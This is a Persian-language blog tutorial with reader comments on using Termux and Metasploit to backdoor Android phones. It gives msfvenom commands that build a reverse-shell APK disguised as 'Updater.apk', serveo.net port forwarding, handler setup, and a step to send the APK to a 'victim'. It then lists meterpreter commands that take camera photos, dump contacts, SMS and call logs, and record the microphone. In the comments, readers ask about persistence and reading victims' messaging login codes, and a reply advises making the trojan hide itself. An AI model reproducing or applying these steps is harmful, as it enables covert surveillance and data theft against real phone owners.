تست نفوذتست نفوذ موبایلمتاسپلویت

تست نفوذ گوشی های اندرویدی با برنامه ترموکس(Termux)

تست نفوذ گوشی های اندرویدی با برنامه ترموکس(Termux)

با عرض سلام و درود خدمت کاربران وب سایت kaliboys.com . در این پست با آموزشی از برنامه ترموکس در خدمت شما هستیم.

سلب مسئولیت: این موضوع فقط برای اهداف آموزشی است. ما مسئول هر گونه استفاده منفی و غیرقانونی از این مطلب نخواهم بود. سعی کنید ازمایش های خود را در محیط ازمایشگاهی انجام دهید.

لازمه های این تست نفوذ

۱) یک گوشی اندرویدی

۲) نرم افزار Android TermuX (دانلود از فروشگاه Play)

۳) فریم ورک Metasploit نصب شده در TermuX (آموزش در اینجا)

۴) اینترنت فعال / اتصال WiFi

۵) TermuX باید اجازه استفاده از Storage External را داشته باشد (برای این منظور فقط یکبار این فرمان را وارد کنید: “termux-setup-storage”)

۶) MiXplorer (برای امضای فایل APK، آن را از وب سایت UpToDown دانلود کنید)

۷) Apk Signer) MiX Signer برای MiXplorer، دانلود آن از فروشگاه Play)

۸) از صفحه کلید هکر در خط فرمان TermuX استفاده کنید.

Port Forwarding

بسیاری از مردم برای پورت فورواردینگ از NGROK استفاده می کنند. اما در NGROK، می توانید ببینید که در هنگام اتصال مجدد به آن دامنه یا پورت جدید ایجاد می شود. دامنه و پورت اختصاصی هم فقط برای کاربران ویژه است. به همین دلیل، برای NGROK شما هر بار که شروع به هک می کنید، باید یک فایل APK جدید ایجاد کنید.

در این اموزش ما از Serveo استفاده می کنیم. در Serveo، شما می توانید به طور دستی پورت مورد نظر خود را در اینترنت ارسال کنید. برای استفاده از پورت فورواردینگ Serveo، شما باید بسته OpenSSH را بر روی TermuX نصب کنید. برای این کار، دستور زیر را در TermuX وارد کنید:

pkg install openssh

پس از نصب، این دستور را تایپ کنید:

ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net

در اینجا شما باید برخی از نکات را در نظر داشته باشید؛ اگر شما می خواهید یک پورت HTTP را فوروارد کنید، سپس پورت های مختلف را در هر دو قسمت “Desired_Port” انتخاب کنید. اما در اینجا می خواهیم یک پورت TCP را پیش ببریم. برای فوروارد پورت TCP، شما باید در پورت Desired_Ports همان پورت های مورد نظر را وارد کنید. همچنین “localhost” را تغییر ندهید. در اینجا ما قصد داریم یک پورت TCP را(برای مثال ۴۵۶۴) Forward کنیم. پس از پورت فوروارد، ممکن است به صورت زیر باشد:

ساخت فایل apk به همراه پیلود جاسازی شده

برای ایجاد فایل APK با Embedload Payload، این دستور را در ترموکس وارد میکنیم:

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
> storage/downloads/Updater.apk

بعد از چند ثانیه منتظر ماندن:

همانطور که مشاهده میکنید فایل APK با پیلود جاسازی شده با موفقیت برای ما ساخته شد. Phone/SD-Card Storage -> downloads -> Updater.apk

همچنین شما می توانید با استفاده از برنامه APK Editor Pro نام (Default: MainActivity) و نسخه فایل APK تولید شده را تغییر دهید.

امضای فایل جدید APK ایجاد شده

ابتدا مدیر فایل MiXplorer را باز کنید و به فایل (APK Un-Signed (Updater.apk بروید.(در پوشه ی آپلود قرار می گیرد).

انگشت خود را بر روی (APK Un-Signed (Updater.apk فشار دهید و دکمه MENU را در گوشه بالا سمت راست MiXplorer انتخاب کنید، سپس “SIGN” را انتخاب کنید.

این گزینه برای ما امضای فایل APK را نمایش میدهد. “AUTO” را انتخاب کنید تا فایل APK را به صورت خودکار و با موفقیت امضا کنید.

در حال حاضر، فایل APK شما با نام filename)-signed.apk) با موفقیت امضا شده است و حجم ان نیز ۹٫۹KB میباشد.

راه اندازی Metasploit در TermuX

با وارد کردن دستور زیر در پنجره جدید ترموکس، چارچوب Metasploit را در TermuX فعال کنید:

msfconsole

نکته(۱): اگر Metasploit-Framework را در برنامه TermuX خود نصب نکرده اید، میتوانید از طریق این لینک اقدام به نصب کنید.

نکته(۲): اگر این خطا را دریافت کردید: “Failed to connect to the database”، همانطور که در تصویر زیر نشان داده شد، دستورات زیر را در NEW SESSION وارد کنید.

mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start

بعد از چند ثانیه منتظر ماندن:

بعد از اینکه ابزار msfconsole شروع به کار می کند، دستورات زیر را با دقت وارد کنید:

msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set LPORT 4564
msf> exploit -j -z

نصب APK در گوشی Android تارگت

باید فایل Payload-Signed.apk را به دستگاه اندروید قربانی خود (به عنوان مثال از طریق بلوتوث) ارسال کنید -> آن را نصب کنید -> سپس آن را باز کنید (اطمینان حاصل کنید که دستگاه قربانی دارای اتصال به اینترنت فعال است).

پس از باز کردن فایل APK در تلفن قربانی، خواهید دید که جلسه Meterpreter در قسمت Metasploit شما فعال خواهد شد. برای باز کردن جلسه Meterpreter از دستگاه قربانی خود، روی دکمه “بازگشت” کلیک کنید و این فرمان را در جلسه Metasploit وارد کنید:

(sessions -i (Session ID

در (شناسه جلسه)، شماره جلسه Meterpreter را انتخاب کنید (به عنوان مثال هنگامی که قربانی شما فایل APK را باز می کند، این پیام را میبینید: Meterpreter Session Opened 1، در اینجا، ۱، شناسه جلسه Meterpreter است).

تبریک……!!!!!!!! شما با موفقیت از Android دستگاه قربانی خود دسترسی گرفتید.

در محیط متااسپلویت نیاز به راهنمایی دارید:

می توانید فرمان {meterpreter> help} را برای مشاهده تمام دستورات در دسترس وارد کنید.

از جمله دستورات مهم:

گرفتن تصویر از دوربین ها

webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg

webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg

دریافت همه مخاطبین

dump_contacts -o storage/downloads/X-Contacts.txt

دریافت همه پیام ها

dump_sms -o storage/downloads/X-SMS.txt

دریافت تماس های ورودی

dump_calllog -o storage/downloads/X-CallLog.txt

جاسوسی از طریق میکروفون

record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3


مطالب مرتبط:

آموزش کرک اینستاگرام در ویندوز + دانلود
آموزش تست نفوذ اینستاگرام با ترموکس
هک اینستاگرام با اسکریپت

یوسف وفایی

فارغ التحصیل کارشناسی IT، علاقه مند به برنامه نویسی و علم امنیت، عاشق یادگیری حرفه های جدید، کنجکاو برای همه چیز، همچنین همیشه تلاش میکنم تا به هدفم برسم...

‫28 نظرها

  1. سلام ایا امکانش هست که با فایل های صوتی وتصویری در ترموکس اندروید را هک کرد؟

  2. سلام من هم از این روش برای ساخت پی لود استفاده کردم هم از روش NGROK ولی پی لودی ک ساخته میشه برام میزنه ۰ بایت مشکل از کجاست؟

  3. سلام خدمت شما
    ببخشید من میخواستم بدونم اگه یک رات با ترموکس بسازم میتونم اونو به یک عکس یا لینک تزریق کنم اگه میشه لطفا توضیح بدید منونم از شما

  4. سلام
    دستور msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=9766 R > storage/downloads/Updater.apk
    رو میزنم اخطار no option میده
    فک کنم یه جاش می اشکال داره
    خواستین اسکرین شات هم میدم توی تلگرام
    T.me/TheSoviet

  5. سلام آیا راتی ک تو گوشی تارگت نصب کردیم بعد ها امکان دسترسی گرفتن ازش وجود داره یعنی من امروز دسترسی گرفتم بعده سه روز دوباره میتونم به گوشی تارگت وصل بشم اگ امکانش هس لطف کنید راهشو بگید مشکل دارم

    1. سلام
      بستگی داره سشن های شما باز باشه یا نه
      که امکانش زیاد هست بعد مدت کوتاهی بسته شوند
      برای عملیات پسا نفوذ میتونید کتاب metasploit advanced رو مطالعه کنید.

      1. بله بستگی به session داره ولی اگ برنامه دائما در پس زمینه اجرا بشه حتی پس از ریستارت شدن گوشی تارگت امکان متصل شدن به برنامه هس اگ راه حلی مد نظرتونه ک بشه برنامه رو دائما در پس زمینه اجرا کرد لطفا کنید بگید

  6. از توضیحات تون ممنونم
    چند سوال :
    1- میشه این برنامه ها رو تو کالی لینوکس نصب کرد ؟
    2- اگر تارگت (سیستم هدف ) apk رو بعد از نصب ، حذف کنه دسترسی ما قطع می گردد؟
    3-

    1. سلام دوست عزیز نه نمیشه برنامه اندرویدی رو توی کالی لینوکس نصب کرد ولی میشه به اطلاعاتش یا کد های برنامه نویسی توش دسترسی داشت
      ===========================================================
      بله اگه طرف برنامه رو پاک کنه دسترسی ما قطع میشه
      پیشنهاد: بهتر توی برنامه ترجانی که ساختید یه تغیراتی بدید که بعد از اجرا شدن توسط قربانی برنامه مخفی بشه.

  7. چطوری میتونم عکس گرفته شده رو تو حافظه دانلود کنم یه جا دیدم اطلاعات رو که تو پوشه یوزر ذخیره میشد به حافظه گوشی انتقال داد دستورتون رو هم میزنم جواب نمیده

  8. سلام به تازگی سرویس پورت فورواردینگ که ذکر کردین قطع شده سرویس جایگزین پیشنهادی شما چیه؟؟ترجیحا انجیراک نباشه ممنون

  9. سلام
    بنده دسترسی گوشی رو گرفتم اما الان میخوام صفحه‌گوشیش که داره کار میکنه رو ببینم یا وارد تلگرام و واتس اپش بشم
    خب از طریق dump sms میشه درخواست داد و کد ورود تلگرام و واتس رو دید اما بعد هدف متوجه میشه کسی قصد نفوذ داشته، راهی هست؟ و امکانش هست اس ام اس رو حذف کرد از گوشی تارگت؟ که متوجه نشه

    1. سلام
      خیر چون شما نفر دوم هستید که لاگین میکنید پس نمیتونید پیام لاگین رو پاک کنید و طرف به محض انلاین شدن متوجه میشه.
      برای حذف پیام ها هم راهی وجود نداره.

  10. سلام خسته نباشید
    من زمانی که میخوام یه دستور رو داخل ترموکس کلون کنم ازم یوزرنیم و پسورد میخواد، قبلا هم داخل سایت گیتهاب ثبت نام کردم ، یوزرنیم رو که وارد میکنم اینتر میزنم درخواست پسورد میکنه ولی به هیچ عنوان نمیشه چیزی تایپ کرد ، ممنون میشم اگه راهنمایی کنید منو

  11. سلام و خسته نباشید
    واقعا کارتون عالیه دمتون گرم من موفق شدم.
    فقط یه سوال
    من برای دفعات بعدی که میخوام به یه افراد متفاوت نفوذ کنم باید دوباره پیلود بسازم یا همین پیلود برای همیشه میشه ازش استفاده کرد؟
    لطفا راهنمایی کنید
    تشکر از سایت خودتون

  12. سلام ممنون از سایت خوبتون ایا میشه ابزار های ترموکس رو تو کارتsdنصب و ذخیره کنیم یا نه اگه میشه چه جوری میشه

    1. سلام برای انتقال برنامه ها به کارت sd میتونید به صورت زیر عمل کنید:
      ابتدا به تنظیمات گوشی و بخش Apps رفته و سپس درصورت فعال بودن حالت انتقال به رم می توانید برنامه مورد نظر خود را از طریق گزینه Move to SD به رم انتقال دهید.

  13. سلام. من یه نرم افزار که لانچر هم هست نصب کردم به اسم >>t-ui کلا برنامه ها رو اجرا میکنه و دستورات ترمینال هم انجام میده. از نظر گرافیکی وتایپ دستورات خیلی بهتر از تروموکس است… اطلاعاتی دارید عآیا. نکته دوم… ترموکس هرچی که دانلود کنه پس از آنینستال حذف میشه یه باید خودم بگردم پیداش کنم برا حذف.. مرسی.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا